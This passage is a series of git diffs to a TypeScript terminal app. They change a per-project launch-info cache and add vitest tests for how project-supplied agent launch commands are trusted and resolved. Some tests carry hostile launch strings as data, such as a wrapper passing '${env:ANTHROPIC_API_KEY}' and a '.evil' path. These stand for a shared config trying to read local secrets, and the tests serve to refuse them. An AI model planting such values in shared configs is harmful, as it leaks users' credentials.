+ * project's theme has to reach terminals that are already on screen — and a module-level `Map` can
+ * never notify them. Rather than turn the whole cache into a store (which would re-render every
+ * terminal on the canvas whenever an unrelated launch field or trust bit moved), this carries the
+ * appearance slice alone, so `useXtermVisualSettings` can subscribe shallowly to exactly what it
+ * renders.
+ *
+ * Kept in lockstep with `cache` — written by the same generation-guarded branch, cleared by
+ * `invalidate` — so the mirror never claims a value the cache has already dropped. Clearing on
+ * invalidate does mean the panel's save path (`invalidate` then re-`ensure`) shows this machine's
+ * GLOBAL appearance for the length of one round trip before the project's own comes back. That is
+ * accepted deliberately: the alternative — holding the last-known value across an invalidate — keeps
+ * a project's colours on screen indefinitely whenever the re-read fails, and a theme that cannot be
+ * explained by any document on disk is a worse bug than a repaint the user sees correct itself.
+ */
+interface ProjectVisualsState {
+  byProject: Record<string, ProjectVisualOverrides>
+}
+export const useProjectVisuals = create<ProjectVisualsState>(() => ({ byProject: {} }))
+
+function sameVisuals(a: ProjectVisualOverrides | undefined, b: ProjectVisualOverrides): boolean {
+  return a !== undefined && a.theme === b.theme && a.fontFamily === b.fontFamily
+}
+
+/** Push one project's appearance slice into the mirror. No-ops when nothing changed, INCLUDING the
+ *  object identity — a re-ensure that answers the same values must not re-render a canvas full of
+ *  terminals (the subscription is shallow, but the entry itself is what it compares). */
+function syncVisuals(projectId: string, info: ProjectLaunchInfo | null): void {
+  const terminal = info?.resolved.terminal
+  const next: ProjectVisualOverrides = {
+    theme: terminal?.theme?.value,
+    fontFamily: terminal?.fontFamily?.value
+  }
+  useProjectVisuals.setState((s) => {
+    if (sameVisuals(s.byProject[projectId], next)) return s
+    return { byProject: { ...s.byProject, [projectId]: next } }
+  })
+}
+
+/** Drop one project's mirrored appearance — its terminals fall back to the global settings until a
+ *  fresh answer lands. */
+function clearVisuals(projectId: string): void {
+  useProjectVisuals.setState((s) => {
+    if (!(projectId in s.byProject)) return s
+    const { [projectId]: _dropped, ...rest } = s.byProject
+    return { byProject: rest }
+  })
+}
 
 function currentGeneration(projectId: string): number {
   return generation.get(projectId) ?? 0
@@ -77,7 +133,10 @@ export function ensureProjectLaunchInfo(projectId: string): Promise<void> {
       // A newer claim since this fetch started means it was superseded (an invalidate, or this
       // very fetch having already been abandoned by a timeout and reissued) — never let a stale
       // answer land over whatever a fresher fetch already wrote.
-      if (currentGeneration(projectId) === gen) cache.set(projectId, { info, fetchedAt: Date.now() })
+      if (currentGeneration(projectId) !== gen) return
+      cache.set(projectId, { info, fetchedAt: Date.now() })
+      // Same branch, same guard: the reactive mirror only ever reflects what the cache accepted.
+      syncVisuals(projectId, info)
     })
     .catch(() => {
       // Fail open: leave whatever is cached (possibly nothing) alone.
@@ -111,6 +170,7 @@ export function ensureProjectLaunchInfo(projectId: string): Promise<void> {
  *  Called on `onTrustChanged` for the affected project, and after a settings-panel save. */
 export function invalidateProjectLaunchInfo(projectId: string): void {
   cache.delete(projectId)
+  clearVisuals(projectId)
   generation.set(projectId, currentGeneration(projectId) + 1)
   inFlight.delete(projectId)
 }
@@ -120,4 +180,5 @@ export function resetProjectLaunchInfoForTests(): void {
   cache.clear()
   inFlight.clear()
   generation.clear()
+  useProjectVisuals.setState({ byProject: {} })
 }

--- a/src/renderer/state/projectLaunchInfo.ts
+++ b/src/renderer/state/projectLaunchInfo.ts
@@ -49,13 +49,19 @@ const ENSURE_WAIT_MS = 3000
  * appearance slice alone, so `useXtermVisualSettings` can subscribe shallowly to exactly what it
  * renders.
  *
- * Kept in lockstep with `cache` — written by the same generation-guarded branch, cleared by
- * `invalidate` — so the mirror never claims a value the cache has already dropped. Clearing on
- * invalidate does mean the panel's save path (`invalidate` then re-`ensure`) shows this machine's
- * GLOBAL appearance for the length of one round trip before the project's own comes back. That is
- * accepted deliberately: the alternative — holding the last-known value across an invalidate — keeps
- * a project's colours on screen indefinitely whenever the re-read fails, and a theme that cannot be
- * explained by any document on disk is a worse bug than a repaint the user sees correct itself.
+ * Written ONLY by `syncVisuals`, on the same generation-guarded branch that writes `cache` — and
+ * deliberately NOT cleared by `invalidateProjectLaunchInfo`. The mirror is last-known appearance,
+ * not a cache entry, and the difference matters because `invalidate` runs after EVERY project
+ * settings commit of any family: clearing here would drop the project's theme (and, with a project
+ * font, re-fit the grid of a possibly co-attached pty twice) on its way to re-reading the very
+ * document that is about to hand the same value back — a visible flash on every committed field,
+ * seconds wide on an SSH project.
+ *
+ * Holding is self-healing, which is why it needs no expiry: all three `invalidate` call sites
+ * re-`ensure` immediately, and that answer OVERWRITES this entry unconditionally — a project whose
+ * override was just deleted answers `{ theme: undefined, fontFamily: undefined }`, which clears it.
+ * The only state that can persist a stale value is one where the re-read never lands at all, and
+ * there the honest thing to show is the appearance the project last actually asked for.
  */
 interface ProjectVisualsState {
   byProject: Record<string, ProjectVisualOverrides>
@@ -78,16 +84,6 @@ function syncVisuals(projectId: string, info: ProjectLaunchInfo | null): void {
   useProjectVisuals.setState((s) => {
     if (sameVisuals(s.byProject[projectId], next)) return s
     return { byProject: { ...s.byProject, [projectId]: next } }
-  })
-}
-
-/** Drop one project's mirrored appearance — its terminals fall back to the global settings until a
- *  fresh answer lands. */
-function clearVisuals(projectId: string): void {
-  useProjectVisuals.setState((s) => {
-    if (!(projectId in s.byProject)) return s
-    const { [projectId]: _dropped, ...rest } = s.byProject
-    return { byProject: rest }
   })
 }
 
@@ -170,7 +166,9 @@ export function ensureProjectLaunchInfo(projectId: string): Promise<void> {
  *  Called on `onTrustChanged` for the affected project, and after a settings-panel save. */
 export function invalidateProjectLaunchInfo(projectId: string): void {
   cache.delete(projectId)
-  clearVisuals(projectId)
+  // NOT `useProjectVisuals`: the appearance mirror is held across an invalidate on purpose — see
+  // its doc comment. Dropping it here would repaint every terminal of the project twice on its way
+  // to re-reading the same values.
   generation.set(projectId, currentGeneration(projectId) + 1)
   inFlight.delete(projectId)
 }

--- a/src/renderer/state/projectLaunchInfo.ts
+++ b/src/renderer/state/projectLaunchInfo.ts
@@ -10,12 +10,22 @@ import type { ProjectLaunchInfo } from '@shared/project-settings'
  * for its own memo.
  *
  * `cache`/`generation` are BOTH keyed by projectId so one project's invalidate never disturbs
- * another's warm entry. `generation` exists solely to keep an ABANDONED fetch from clobbering a
- * fresher one: `invalidateProjectLaunchInfo` bumps it and drops the in-flight entry so the next
- * `ensure` starts a real new request, but the OLD request (already in flight) is not cancelled —
- * only silenced. Its `.then` still runs and checks the generation before writing, so a slow answer
- * from before the invalidate can never overwrite what a later fetch (or the invalidate itself)
- * already settled on.
+ * another's warm entry. `generation` is claimed FRESH by every fetch this module actually issues
+ * (not merely bumped by `invalidate`): a write is honored only while its own claimed value is still
+ * the current one. This closes two distinct ways an abandoned fetch can otherwise clobber a fresher
+ * answer:
+ *  - `invalidateProjectLaunchInfo` bumps it directly and drops the in-flight entry, so an in-flight
+ *    fetch that predates the invalidate is superseded even if nothing ever re-`ensure`s.
+ *  - the ENSURE_WAIT_MS timeout (below) drops the in-flight entry WITHOUT touching the generation —
+ *    on its own, a fetch that never settles (a dropped Server Edition WS-RPC request neither times
+ *    out nor rejects — see permissionMode.ts's `CAPS_WAIT_MS` doc) would otherwise leave `inFlight`
+ *    pointing at an exhausted promise forever, so every later `ensure` for that project just
+ *    rejoins it and NO fresh wire call is ever made again. Dropping the entry lets the next `ensure`
+ *    issue a real new fetch, which claims its OWN generation — so if the original fetch finally
+ *    answers after that, its stale generation no longer matches and its write is silently dropped,
+ *    exactly like the invalidate case.
+ * Neither path cancels the abandoned fetch (there is nothing to cancel it with) — only its write is
+ * ever silenced, never the promise itself.
  */
 const cache = new Map<string, { info: ProjectLaunchInfo | null; fetchedAt: number }>()
 const inFlight = new Map<string, Promise<void>>()
@@ -29,6 +39,16 @@ function currentGeneration(projectId: string): number {
   return generation.get(projectId) ?? 0
 }
 
+/** Claims and returns a generation strictly newer than whatever the project is currently at —
+ *  called once per fetch actually issued (never on a joined in-flight call), so two fetches for the
+ *  same project always hold distinguishable values regardless of which one (invalidate, timeout, or
+ *  a plain re-ensure) triggered the reissue. */
+function claimGeneration(projectId: string): number {
+  const next = currentGeneration(projectId) + 1
+  generation.set(projectId, next)
+  return next
+}
+
 /** The last-known answer, synchronously — null when nothing has been fetched yet (or the project
  *  was never warmed, or the fetch itself found no shared executable content to gate at all: a
  *  caller reading null must treat it as "no override behavior", i.e. fail open, exactly like an
@@ -40,29 +60,45 @@ export function projectLaunchInfoNow(projectId: string): ProjectLaunchInfo | nul
 /**
  * Kick off (or join) the launch-info fetch for one project. Never rejects, and never takes longer
  * than `ENSURE_WAIT_MS` — on timeout the promise resolves with whatever is cached (possibly
- * nothing), and a late answer still lands in `cache` for the NEXT read. Memoized per project: a
- * second caller while one is already in flight joins the same promise rather than firing a second
- * request.
+ * nothing), and a late answer still lands in `cache` for the NEXT read PROVIDED nothing fresher
+ * has claimed the project's generation since (see the module doc). Memoized per project: a second
+ * caller while one is already in flight joins the same promise rather than firing a second request;
+ * once a fetch's own in-flight entry is cleared (settled, or timed out), the NEXT caller always
+ * issues a brand new wire call — a project is never left permanently cold by one dropped request.
  */
 export function ensureProjectLaunchInfo(projectId: string): Promise<void> {
   const existing = inFlight.get(projectId)
   if (existing) return existing
 
-  const gen = currentGeneration(projectId)
+  const gen = claimGeneration(projectId)
   const fetch = Promise.resolve()
     .then(() => window.nodeTerminal.projectSettings.launchInfo(projectId))
     .then((info) => {
-      // A bump since this fetch started means `invalidateProjectLaunchInfo` (and likely a fresher
-      // `ensure`) ran while we were in flight — never let a stale answer land over it.
+      // A newer claim since this fetch started means it was superseded (an invalidate, or this
+      // very fetch having already been abandoned by a timeout and reissued) — never let a stale
+      // answer land over whatever a fresher fetch already wrote.
       if (currentGeneration(projectId) === gen) cache.set(projectId, { info, fetchedAt: Date.now() })
     })
     .catch(() => {
       // Fail open: leave whatever is cached (possibly nothing) alone.
     })
-  const timeout = new Promise<void>((resolve) => setTimeout(resolve, ENSURE_WAIT_MS))
-  const bounded = Promise.race([fetch, timeout])
-  // Own in-flight entry cleared only by the request that owns it — an abandoned (invalidated)
-  // fetch's `finally` must not delete a NEWER fetch's entry out from under it.
+
+  // `bounded` is referenced inside the timeout callback before its own declaration below — safe
+  // because the callback only runs asynchronously, well after `bounded` is assigned.
+  let bounded!: Promise<void>
+  const timeout = new Promise<void>((resolve) => {
+    setTimeout(() => {
+      // The wire call may simply never answer (see the module doc). Clear OUR OWN in-flight entry
+      // — guarded on identity, since a fetch that already finished (and cleared itself in the
+      // `finally` below) may have already been superseded by a newer `ensure` by the time this
+      // timer fires, and that newer entry must not be touched.
+      if (inFlight.get(projectId) === bounded) inFlight.delete(projectId)
+      resolve()
+    }, ENSURE_WAIT_MS)
+  })
+  bounded = Promise.race([fetch, timeout])
+  // Same identity guard as the timeout branch: a fetch that answers after ITS OWN timeout already
+  // cleared (and possibly a newer fetch is now in flight) must not delete that newer entry.
   fetch.finally(() => {
     if (inFlight.get(projectId) === bounded) inFlight.delete(projectId)
   })

--- a/src/renderer/state/projectLaunchInfo.ts
+++ b/src/renderer/state/projectLaunchInfo.ts
@@ -1,0 +1,87 @@
+import type { ProjectLaunchInfo } from '@shared/project-settings'
+
+/**
+ * Warmed renderer cache of `project-settings:launch-info` (`projectLaunchInfoNow` /
+ * `ensureProjectLaunchInfo` / `invalidateProjectLaunchInfo`) — the `permissionMode.ts`
+ * `ensureClaudeCliCaps`/`claudeCliCapsNow` shape, keyed per project instead of app-global.
+ *
+ * Module-level, NOT zustand: nothing renders directly off this — it is read at the moment a launch
+ * needs to know whether a shared-sourced value is trusted, same reasoning permissionMode.ts gives
+ * for its own memo.
+ *
+ * `cache`/`generation` are BOTH keyed by projectId so one project's invalidate never disturbs
+ * another's warm entry. `generation` exists solely to keep an ABANDONED fetch from clobbering a
+ * fresher one: `invalidateProjectLaunchInfo` bumps it and drops the in-flight entry so the next
+ * `ensure` starts a real new request, but the OLD request (already in flight) is not cancelled —
+ * only silenced. Its `.then` still runs and checks the generation before writing, so a slow answer
+ * from before the invalidate can never overwrite what a later fetch (or the invalidate itself)
+ * already settled on.
+ */
+const cache = new Map<string, { info: ProjectLaunchInfo | null; fetchedAt: number }>()
+const inFlight = new Map<string, Promise<void>>()
+const generation = new Map<string, number>()
+
+/** How long `ensureProjectLaunchInfo` waits on the round trip before giving up on it — same bound
+ *  as `permissionMode.ts`'s `CAPS_WAIT_MS`. A launch must never block on this. */
+const ENSURE_WAIT_MS = 3000
+
+function currentGeneration(projectId: string): number {
+  return generation.get(projectId) ?? 0
+}
+
+/** The last-known answer, synchronously — null when nothing has been fetched yet (or the project
+ *  was never warmed, or the fetch itself found no shared executable content to gate at all: a
+ *  caller reading null must treat it as "no override behavior", i.e. fail open, exactly like an
+ *  unknown project id answers over the wire). */
+export function projectLaunchInfoNow(projectId: string): ProjectLaunchInfo | null {
+  return cache.get(projectId)?.info ?? null
+}
+
+/**
+ * Kick off (or join) the launch-info fetch for one project. Never rejects, and never takes longer
+ * than `ENSURE_WAIT_MS` — on timeout the promise resolves with whatever is cached (possibly
+ * nothing), and a late answer still lands in `cache` for the NEXT read. Memoized per project: a
+ * second caller while one is already in flight joins the same promise rather than firing a second
+ * request.
+ */
+export function ensureProjectLaunchInfo(projectId: string): Promise<void> {
+  const existing = inFlight.get(projectId)
+  if (existing) return existing
+
+  const gen = currentGeneration(projectId)
+  const fetch = Promise.resolve()
+    .then(() => window.nodeTerminal.projectSettings.launchInfo(projectId))
+    .then((info) => {
+      // A bump since this fetch started means `invalidateProjectLaunchInfo` (and likely a fresher
+      // `ensure`) ran while we were in flight — never let a stale answer land over it.
+      if (currentGeneration(projectId) === gen) cache.set(projectId, { info, fetchedAt: Date.now() })
+    })
+    .catch(() => {
+      // Fail open: leave whatever is cached (possibly nothing) alone.
+    })
+  const timeout = new Promise<void>((resolve) => setTimeout(resolve, ENSURE_WAIT_MS))
+  const bounded = Promise.race([fetch, timeout])
+  // Own in-flight entry cleared only by the request that owns it — an abandoned (invalidated)
+  // fetch's `finally` must not delete a NEWER fetch's entry out from under it.
+  fetch.finally(() => {
+    if (inFlight.get(projectId) === bounded) inFlight.delete(projectId)
+  })
+  inFlight.set(projectId, bounded)
+  return bounded
+}
+
+/** Drops the cached answer and abandons any in-flight fetch's write (see the module doc) — the
+ *  next `projectLaunchInfoNow` reads null and the next `ensureProjectLaunchInfo` starts fresh.
+ *  Called on `onTrustChanged` for the affected project, and after a settings-panel save. */
+export function invalidateProjectLaunchInfo(projectId: string): void {
+  cache.delete(projectId)
+  generation.set(projectId, currentGeneration(projectId) + 1)
+  inFlight.delete(projectId)
+}
+
+/** Test seam: drop every memo (cache, in-flight, generation counters). */
+export function resetProjectLaunchInfoForTests(): void {
+  cache.clear()
+  inFlight.clear()
+  generation.clear()
+}

--- a/src/renderer/state/workspace.project-launch-literal.test.ts
+++ b/src/renderer/state/workspace.project-launch-literal.test.ts
@@ -1,0 +1,103 @@
+import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest'
+import type { ProjectLaunchInfo } from '@shared/project-settings'
+import { agentLaunchOverride, resetLaunchTrustAsksForTests } from './workspace'
+import { ensureProjectLaunchInfo, resetProjectLaunchInfoForTests } from './projectLaunchInfo'
+import { useSettings } from './settings'
+import { DEFAULT_SETTINGS, type Settings } from '@shared/types'
+
+/**
+ * LITERAL ONLY, for a PROJECT-sourced launchCmd — the same rule the project's env already obeys
+ * (`ProjectSpawnOverrides.env`: "`${env:VAR}` is NOT expanded here"), now enforced on the launch
+ * command as well.
+ *
+ * The hole this pins: `assembleLaunchCommand` → `expandedProgram` expands `${env:VAR}` in whatever
+ * `launchCmdOverride` it is handed, while the consent dialog renders the launchCmd VERBATIM. For a
+ * git-shared, hand-editable document that difference is a read of this machine's environment
+ * laundered past a dialog that showed the token — and there is no honest way to type it either: a
+ * literal `${env:X}` is a bad substitution at bash/zsh. So a project launchCmd carrying a token is
+ * not a launch command at all, and resolves exactly like the non-string case: the layer below.
+ *
+ * The GLOBAL launch override (Settings → Agents) and a custom agent's own `launchCmd` are untouched
+ * — those are the local user's own typing, previewed with expansion in Settings.
+ */
+
+const requestTrust = vi.fn(() => Promise.resolve(false))
+
+/** Seeds the module-level launch-info cache the way Canvas warms it (one wire round trip). */
+async function warmProject(projectId: string, info: ProjectLaunchInfo): Promise<void> {
+  ;(globalThis as { window?: unknown }).window = {
+    nodeTerminal: {
+      projectSettings: { launchInfo: () => Promise.resolve(info) },
+      projectSetup: { requestTrust }
+    }
+  }
+  await ensureProjectLaunchInfo(projectId)
+}
+
+const paired = (cmd: string, source: 'local' | 'shared'): ProjectLaunchInfo => ({
+  resolved: {
+    setup: {},
+    worktree: {},
+    agents: {
+      defaultAgentId: { value: 'claude', source },
+      launchCmd: { value: cmd, source }
+    },
+    terminal: {}
+  },
+  trusted: { agents: true, shell: true }
+})
+
+const settingsWith = (patch: Partial<Settings>): void => {
+  useSettings.setState({ settings: { ...DEFAULT_SETTINGS, ...patch } })
+}
+
+beforeEach(() => {
+  resetProjectLaunchInfoForTests()
+  resetLaunchTrustAsksForTests()
+  requestTrust.mockClear()
+})
+
+afterEach(() => {
+  useSettings.setState({ settings: DEFAULT_SETTINGS })
+  delete (globalThis as { window?: unknown }).window
+})
+
+describe('agentLaunchOverride — a project launchCmd is literal, never ${env:…}-expanded', () => {
+  it.each(['local', 'shared'] as const)(
+    'refuses a %s launchCmd that references the environment, falling to the global layer',
+    async (source) => {
+      settingsWith({ agentLaunchCommands: { claude: 'global-wrap' } })
+      await warmProject('p1', paired('${env:HOME}/.evil/claude', source))
+      expect(agentLaunchOverride('claude', 'p1')).toBe('global-wrap')
+    }
+  )
+
+  // The token can sit anywhere in the line — a wrapper with an env-referencing argument reads the
+  // environment just as surely as one in the program position.
+  it('refuses a token anywhere in the line, not just in the program position', async () => {
+    await warmProject('p1', paired('wrapper --token ${env:ANTHROPIC_API_KEY} -- claude', 'shared'))
+    expect(agentLaunchOverride('claude', 'p1')).toBeUndefined()
+  })
+
+  // Refused BEFORE the trust branch, for the same reason an out-of-scope agent is: a value that can
+  // never be consumed must not raise a question about itself.
+  it('never asks for trust about an untrusted shared launchCmd it would refuse anyway', async () => {
+    const info = paired('${env:HOME}/bin/claude', 'shared')
+    info.trusted.agents = false
+    await warmProject('p1', info)
+    expect(agentLaunchOverride('claude', 'p1')).toBeUndefined()
+    expect(requestTrust).not.toHaveBeenCalled()
+  })
+
+  // The rule is narrow: an ordinary wrapper — including one carrying a plain shell `$VAR`, which
+  // the assembler never touches — is consumed exactly as before.
+  it('still consumes an ordinary project launchCmd', async () => {
+    await warmProject('p1', paired('nix develop -c claude', 'shared'))
+    expect(agentLaunchOverride('claude', 'p1')).toBe('nix develop -c claude')
+  })
+
+  it('leaves the GLOBAL launch override free to reference the environment', async () => {
+    settingsWith({ agentLaunchCommands: { claude: '${env:HOME}/bin/claude' } })
+    expect(agentLaunchOverride('claude', 'p1')).toBe('${env:HOME}/bin/claude')
+  })
+})

--- a/src/renderer/state/workspace.project-launch.test.ts
+++ b/src/renderer/state/workspace.project-launch.test.ts
@@ -14,9 +14,10 @@ import { DEFAULT_SETTINGS, type Settings } from '@shared/types'
 /**
  * The PER-PROJECT half of the launch layering (`.nodeterm/settings.json` → `agents`):
  *  - `launchCmd` — this project's local doc, then its git-SHARED doc but ONLY once that family is
- *    trusted, then the user's global Settings → Agents override. Scoped to the agent the project
- *    names as its default, because that is exactly what the panel promises ("Overrides how the
- *    default agent is launched").
+ *    trusted, then the user's global Settings → Agents override. Scoped to the agent THIS PROJECT
+ *    names as its default and to no other — never the user's global default, which would let a doc
+ *    shipping only a launchCmd follow a mutable local preference into a foreign agent's node. An
+ *    unpaired launchCmd is inert: consumed by nothing, prompting for nothing.
  *  - `defaultAgentId` — what a NON-explicit new node launches, above the global default.
  * A launch never blocks and never fails closed: no warm snapshot ⇒ byte-identical to before.
  */
@@ -46,6 +47,17 @@ const settingsWith = (patch: Partial<Settings>): void => {
   useSettings.setState({ settings: { ...DEFAULT_SETTINGS, ...patch } })
 }
 
+/** The PAIRED shape a consumable launchCmd needs: the project names its own default agent, and the
+ *  launch command is about that agent. `def` defaults to claude — the agent these tests launch. */
+const paired = (
+  cmd: unknown,
+  source: 'local' | 'shared',
+  def: unknown = 'claude'
+): ProjectLaunchInfo['resolved']['agents'] => ({
+  defaultAgentId: { value: def as string, source },
+  launchCmd: { value: cmd as string, source }
+})
+
 beforeEach(() => {
   resetProjectLaunchInfoForTests()
   resetLaunchTrustAsksForTests()
@@ -61,7 +73,7 @@ afterEach(() => {
 describe('agentLaunchOverride — per-project launchCmd', () => {
   it('is the global override when no project is named', async () => {
     settingsWith({ agentLaunchCommands: { claude: 'global-wrap' } })
-    await warmProject('p1', info({ launchCmd: { value: 'proj-wrap', source: 'local' } }, true))
+    await warmProject('p1', info(paired('proj-wrap', 'local'), true))
     expect(agentLaunchOverride('claude')).toBe('global-wrap')
   })
 
@@ -72,7 +84,7 @@ describe('agentLaunchOverride — per-project launchCmd', () => {
 
   it('lets a project LOCAL launchCmd win over the global override', async () => {
     settingsWith({ agentLaunchCommands: { claude: 'global-wrap' } })
-    await warmProject('p1', info({ launchCmd: { value: 'local-wrap', source: 'local' } }, false))
+    await warmProject('p1', info(paired('local-wrap', 'local'), false))
     expect(agentLaunchOverride('claude', 'p1')).toBe('local-wrap')
     // A local value is the user's own typing — never gated, so nothing is ever asked.
     expect(requestTrust).not.toHaveBeenCalled()
@@ -80,25 +92,25 @@ describe('agentLaunchOverride — per-project launchCmd', () => {
 
   it('lets a TRUSTED shared launchCmd win over the global override', async () => {
     settingsWith({ agentLaunchCommands: { claude: 'global-wrap' } })
-    await warmProject('p1', info({ launchCmd: { value: 'shared-wrap', source: 'shared' } }, true))
+    await warmProject('p1', info(paired('shared-wrap', 'shared'), true))
     expect(agentLaunchOverride('claude', 'p1')).toBe('shared-wrap')
     expect(requestTrust).not.toHaveBeenCalled()
   })
 
   it('falls PAST an untrusted shared launchCmd to the global override', async () => {
     settingsWith({ agentLaunchCommands: { claude: 'global-wrap' } })
-    await warmProject('p1', info({ launchCmd: { value: 'shared-wrap', source: 'shared' } }, false))
+    await warmProject('p1', info(paired('shared-wrap', 'shared'), false))
     expect(agentLaunchOverride('claude', 'p1')).toBe('global-wrap')
   })
 
   it('falls through to the bare command when there is no global override either', async () => {
-    await warmProject('p1', info({ launchCmd: { value: 'shared-wrap', source: 'shared' } }, false))
+    await warmProject('p1', info(paired('shared-wrap', 'shared'), false))
     expect(agentLaunchOverride('claude', 'p1')).toBeUndefined()
     expect(claudeLaunchCommand('p1')).toBe('claude')
   })
 
   it('asks for trust exactly ONCE per project per session, however many launches ask', async () => {
-    await warmProject('p1', info({ launchCmd: { value: 'shared-wrap', source: 'shared' } }, false))
+    await warmProject('p1', info(paired('shared-wrap', 'shared'), false))
     agentLaunchOverride('claude', 'p1')
     agentLaunchOverride('claude', 'p1')
     agentLaunchOverride('claude', 'p1')
@@ -109,7 +121,7 @@ describe('agentLaunchOverride — per-project launchCmd', () => {
   it('survives a requestTrust that REJECTS — the launch line is still resolved', async () => {
     requestTrust.mockImplementation(() => Promise.reject(new Error('no handler')))
     settingsWith({ agentLaunchCommands: { claude: 'global-wrap' } })
-    await warmProject('p1', info({ launchCmd: { value: 'shared-wrap', source: 'shared' } }, false))
+    await warmProject('p1', info(paired('shared-wrap', 'shared'), false))
     expect(agentLaunchOverride('claude', 'p1')).toBe('global-wrap')
     await Promise.resolve()
   })
@@ -122,54 +134,89 @@ describe('agentLaunchOverride — per-project launchCmd', () => {
 
   it('applies only to the agent the project targets — another agent keeps the global path', async () => {
     settingsWith({ agentLaunchCommands: { codex: 'global-codex' }, defaultAgent: 'claude' })
-    await warmProject('p1', info({ launchCmd: { value: 'proj-wrap', source: 'local' } }, true))
+    await warmProject('p1', info(paired('proj-wrap', 'local'), true))
     expect(agentLaunchOverride('claude', 'p1')).toBe('proj-wrap')
     expect(agentLaunchOverride('codex', 'p1')).toBe('global-codex')
   })
 
   it('follows the project’s own defaultAgentId when deciding which agent it targets', async () => {
     settingsWith({ defaultAgent: 'claude' })
-    await warmProject(
-      'p1',
-      info(
-        {
-          defaultAgentId: { value: 'codex', source: 'local' },
-          launchCmd: { value: 'proj-wrap', source: 'local' }
-        },
-        true
-      )
-    )
+    await warmProject('p1', info(paired('proj-wrap', 'local', 'codex'), true))
     expect(agentLaunchOverride('codex', 'p1')).toBe('proj-wrap')
     expect(agentLaunchOverride('claude', 'p1')).toBeUndefined()
   })
 
   it('does not ask for trust when the shared launchCmd targets another agent', async () => {
     settingsWith({ defaultAgent: 'claude' })
-    await warmProject('p1', info({ launchCmd: { value: 'shared-wrap', source: 'shared' } }, false))
+    await warmProject('p1', info(paired('shared-wrap', 'shared'), false))
     expect(agentLaunchOverride('codex', 'p1')).toBeUndefined()
     expect(requestTrust).not.toHaveBeenCalled()
   })
 
   it('ignores a blank project launchCmd (and asks nothing for it)', async () => {
     settingsWith({ agentLaunchCommands: { claude: 'global-wrap' } })
-    await warmProject('p1', info({ launchCmd: { value: '   ', source: 'shared' } }, false))
+    await warmProject('p1', info(paired('   ', 'shared'), false))
     expect(agentLaunchOverride('claude', 'p1')).toBe('global-wrap')
     expect(requestTrust).not.toHaveBeenCalled()
   })
 
   it('ignores a non-string launchCmd from a hostile shared document', async () => {
     settingsWith({ agentLaunchCommands: { claude: 'global-wrap' } })
-    await warmProject(
-      'p1',
-      info({ launchCmd: { value: 42 as unknown as string, source: 'shared' } }, true)
-    )
+    await warmProject('p1', info(paired(42, 'shared'), true))
     expect(agentLaunchOverride('claude', 'p1')).toBe('global-wrap')
+  })
+})
+
+/**
+ * The UNPAIRED case, and the reason the scope comparison is the project's OWN defaultAgentId and
+ * never `resolveNewNodeAgent`'s global fallback: a doc that ships a launchCmd alone would otherwise
+ * chase whatever this machine's global default agent happens to be — a different agent per
+ * teammate, and a different one again after the local user changes an unrelated Setting.
+ */
+describe('agentLaunchOverride — an UNPAIRED launchCmd is inert', () => {
+  const unpaired = (source: 'local' | 'shared'): ProjectLaunchInfo['resolved']['agents'] => ({
+    launchCmd: { value: 'nix develop -c claude', source }
+  })
+
+  it.each(['claude', 'codex', 'gemini', 'custom:x'] as const)(
+    'is never consumed for %s when the project names no default agent of its own',
+    async (agentId) => {
+      // Every one of these is this machine's global default in turn — the value that must NOT
+      // decide what a shared launch command applies to.
+      settingsWith({
+        defaultAgent: agentId,
+        customAgents: [{ id: 'custom:x', label: 'X', launchCmd: 'x-cli' }] as Settings['customAgents']
+      })
+      await warmProject('p1', info(unpaired('shared'), true))
+      expect(agentLaunchOverride(agentId, 'p1')).toBeUndefined()
+    }
+  )
+
+  it('never prompts for trust on an untrusted shared launchCmd nobody can consume', async () => {
+    settingsWith({ defaultAgent: 'claude' })
+    await warmProject('p1', info(unpaired('shared'), false))
+    expect(agentLaunchOverride('claude', 'p1')).toBeUndefined()
+    expect(requestTrust).not.toHaveBeenCalled()
+  })
+
+  it('is inert for a LOCAL launchCmd too — the pairing rule is about meaning, not provenance', async () => {
+    settingsWith({ agentLaunchCommands: { claude: 'global-wrap' }, defaultAgent: 'claude' })
+    await warmProject('p1', info(unpaired('local'), true))
+    expect(agentLaunchOverride('claude', 'p1')).toBe('global-wrap')
+  })
+
+  it('is inert when the project names a default agent this machine cannot launch', async () => {
+    settingsWith({ defaultAgent: 'claude' })
+    await warmProject('p1', info(paired('proj-wrap', 'shared', 'custom:gone'), true))
+    expect(agentLaunchOverride('claude', 'p1')).toBeUndefined()
+    expect(agentLaunchOverride('custom:gone', 'p1')).toBeUndefined()
+    expect(requestTrust).not.toHaveBeenCalled()
   })
 })
 
 describe('createAgentNode — the project launch command reaches the typed line', () => {
   it('launches the project’s default agent through the project wrapper', async () => {
-    await warmProject('p1', info({ launchCmd: { value: 'proj-wrap', source: 'local' } }, true))
+    await warmProject('p1', info(paired('proj-wrap', 'local'), true))
     const node = createAgentNode(
       'claude',
       0,

--- a/src/renderer/state/workspace.project-launch.test.ts
+++ b/src/renderer/state/workspace.project-launch.test.ts
@@ -1,0 +1,246 @@
+import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest'
+import type { ProjectLaunchInfo } from '@shared/project-settings'
+import {
+  agentLaunchOverride,
+  claudeLaunchCommand,
+  createAgentNode,
+  resolveNewNodeAgent,
+  resetLaunchTrustAsksForTests
+} from './workspace'
+import { ensureProjectLaunchInfo, resetProjectLaunchInfoForTests } from './projectLaunchInfo'
+import { useSettings } from './settings'
+import { DEFAULT_SETTINGS, type Settings } from '@shared/types'
+
+/**
+ * The PER-PROJECT half of the launch layering (`.nodeterm/settings.json` → `agents`):
+ *  - `launchCmd` — this project's local doc, then its git-SHARED doc but ONLY once that family is
+ *    trusted, then the user's global Settings → Agents override. Scoped to the agent the project
+ *    names as its default, because that is exactly what the panel promises ("Overrides how the
+ *    default agent is launched").
+ *  - `defaultAgentId` — what a NON-explicit new node launches, above the global default.
+ * A launch never blocks and never fails closed: no warm snapshot ⇒ byte-identical to before.
+ */
+
+const requestTrust = vi.fn(() => Promise.resolve(false))
+
+/** Seeds the module-level launch-info cache the way Canvas warms it (one wire round trip). */
+async function warmProject(projectId: string, info: ProjectLaunchInfo | null): Promise<void> {
+  ;(globalThis as { window?: unknown }).window = {
+    nodeTerminal: {
+      projectSettings: { launchInfo: () => Promise.resolve(info) },
+      projectSetup: { requestTrust }
+    }
+  }
+  await ensureProjectLaunchInfo(projectId)
+}
+
+const info = (
+  agents: ProjectLaunchInfo['resolved']['agents'],
+  trustedAgents: boolean
+): ProjectLaunchInfo => ({
+  resolved: { setup: {}, worktree: {}, agents, terminal: {} },
